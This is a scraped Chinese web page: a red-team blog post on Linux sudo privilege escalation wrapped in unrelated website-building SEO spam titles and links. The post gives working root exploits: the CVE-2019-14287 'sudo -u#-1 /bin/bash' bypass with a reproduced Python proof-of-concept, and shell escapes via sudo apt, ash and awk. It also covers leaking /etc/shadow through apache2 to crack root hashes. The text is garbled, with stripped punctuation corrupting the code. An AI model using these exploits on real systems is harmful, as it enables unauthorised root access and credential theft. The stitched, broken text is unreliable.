当前位置: 首页 > news >正文

公司网站备案需要什么资料地域名网址ip查询

公司网站备案需要什么资料,地域名网址ip查询,单页营销网站怎么做,陕西网站建设企业#x1f36c; 博主介绍#x1f468;‍#x1f393; 博主介绍#xff1a;大家好#xff0c;我是 hacker-routing #xff0c;很高兴认识大家~ ✨主攻领域#xff1a;【渗透领域】【应急响应】 【Java】 【VulnHub靶场复现】【面试分析】 #x1f389;点赞➕评论➕收藏 … 博主介绍‍ 博主介绍大家好我是 hacker-routing 很高兴认识大家~ ✨主攻领域【渗透领域】【应急响应】 【Java】 【VulnHub靶场复现】【面试分析】 点赞➕评论➕收藏 养成习惯一键三连 欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋 作者水平有限欢迎各位大佬指点相互学习进步 目录 前言 1、CVE-2019-14287漏洞 2、sudo apt 3、sudo apache2 4、sudo ash 5、sudo awk 前言 【「红队笔记」Linux提权精讲Sudo风暴 - Sudo风暴全70讲扫地僧级别心法研究提权技术的同时打磨你对linux内核的深度理解。渗透测试宝典。】 「红队笔记」Linux提权精讲Sudo风暴 - Sudo风暴全70讲扫地僧级别心法研究提权技术的同时打磨你对linux内核的深度理解。渗透测试宝典。_哔哩哔哩_bilibili 1、CVE-2019-14287漏洞 sudo提权利用 下面的不用密码直接执行 /bin/bash 然后拿root权限 sudo -u#-1 /bin/bash在exploit上面也可以找到 Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical HackersThe Exploit Database - Exploits, Shellcode, 0days, Remote Exploits, Local Exploits, Web Apps, Vulnerability Reports, Security Articles, Tutorials and more.https://www.exploit-db.com/ 我们可以看到下面Exploit 里面的介绍和漏洞演示 这是一个关于 sudo 版本 1.8.27 存在安全绕过漏洞的 exploit。这个漏洞可以被利用来绕过 sudo 的限制允许未经授权的用户以 root 用户执行特权命令。 这个漏洞由 Joe Vennix 发现并分析Exploit 作者是 Mohin Paramasivam。该漏洞编号为 CVE-2019-14287影响版本为 1.8.28。建议所有用户升级到修复此问题的 sudo 版本 1.8.28。 sudo -v |grep version //查看sudo版本# Exploit Title : sudo 1.8.27 - Security Bypass # Date : 2019-10-15 # Original Author: Joe Vennix # Exploit Author : Mohin Paramasivam (Shad0wQu35t) # Version : Sudo 1.8.28 # Tested on Linux # Credit : Joe Vennix from Apple Information Security found and analyzed the bug # Fix : The bug is fixed in sudo 1.8.28 # CVE : 2019-14287Check for the user sudo permissionssudo -l User hacker may run the following commands on kali:(ALL, !root) /bin/bashSo user hacker cant run /bin/bash as root (!root)User hacker sudo privilege in /etc/sudoers# User privilege specification root ALL(ALL:ALL) ALLhacker ALL(ALL,!root) /bin/bashWith ALL specified, user hacker can run the binary /bin/bash as any userEXPLOIT: sudo -u#-1 /bin/bashExample : hackerkali:~$ sudo -u#-1 /bin/bash rootkali:/home/hacker# id uid0(root) gid1000(hacker) groups1000(hacker) rootkali:/home/hacker#Description : Sudo doesnt check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv -u#-1 returns as 0 which is roots idand /bin/bash is executed with root permission Proof of Concept Code :How to use : python3 sudo_exploit.py#!/usr/bin/python3import os#Get current usernameusername input(Enter current username :)#check which binary the user can run with sudoos.system(sudo -l priv)os.system(cat priv | grep ALL | cut -d ) -f 2 binary)binary_file open(binary)binary binary_file.read()#execute sudo exploitprint(Lets hope it works)os.system(sudo -u#-1 binary) 2、sudo apt 通过sudo -l 命令发现存在apt提权然后输入下面的命令就可以拿到root权限了 sudo apt update -o APT::Update::Pre-Invoke::/bin/shapt | GTFOBins https://gtfobins.github.io/gtfobins/apt/#sudo 3、sudo apache2 sudo apache2 -f /etc/shadow //列出错误的root哈希值利用john进行爆破 4、sudo ash 发现ash因为ash本身就是一个shell所以我们直接sudo ash就可以拿到root权限了 5、sudo awk 查看sudo提权发现awk存在 sudo awk BEGIN {system(/bin/sh)}
http://www.hkea.cn/news/14505480/

相关文章:

  • 萍乡网站建设哪家公司好淘宝官网首页图片
  • 有哪些网站是做背景图片素材的长沙seo优化推荐
  • 网站设计主流尺寸dw做网站实例
  • 广州 网站制wordpress管理员名
  • 建设银行内部网站网站建设的基本目标
  • 国外排版网站中国十大装修公司
  • 申诉网站风险拥有服务器后如何做网站
  • dw网站建设讨论总结wordpress昵称中文
  • 成都网站建设哪里有wordpress更改布局
  • 有没有跟一起做网店一样的网站政务网站集约化建设要求
  • 网站建设中颜色的感染力asp建站程序
  • 网站宣传方案网站建设维护论文
  • 怎么在华为防火墙做网站映射协助别人做网站犯法么
  • 欧 美 做 爱 视频网站代刷网站系统怎么做
  • 外贸网站建设内容包括哪些做教育网站还挣钱吗
  • 河北网站备案手机号码短信核验服务器是干嘛的
  • 小米官网网站建设衡阳网站建设技术外包
  • 开发专业网站天津室内设计公司排名
  • 购买网站模板怎么用wordpress不跳转页面
  • 网络营销顾问seo竞价网站建设
  • 做网站pytonwordpress小白
  • 临沂市建设局兰山区网站wordpress群组插件
  • 中介网站模板做app开发公司
  • php网站怎么做缓存安徽建海建设工程有限公司网站
  • 枣庄网站建设枣庄焦作做网站最专业的公司
  • 网页设计模板网站免费下载学做网站设计需要多少钱
  • 网站后台登陆密码做网站赚钱吗 谁教教我
  • 淄博网站制作首选专家图片模板制作app
  • 网站建设易客免费咨询服务协议
  • 网站建设下什么科目网站设计机构培训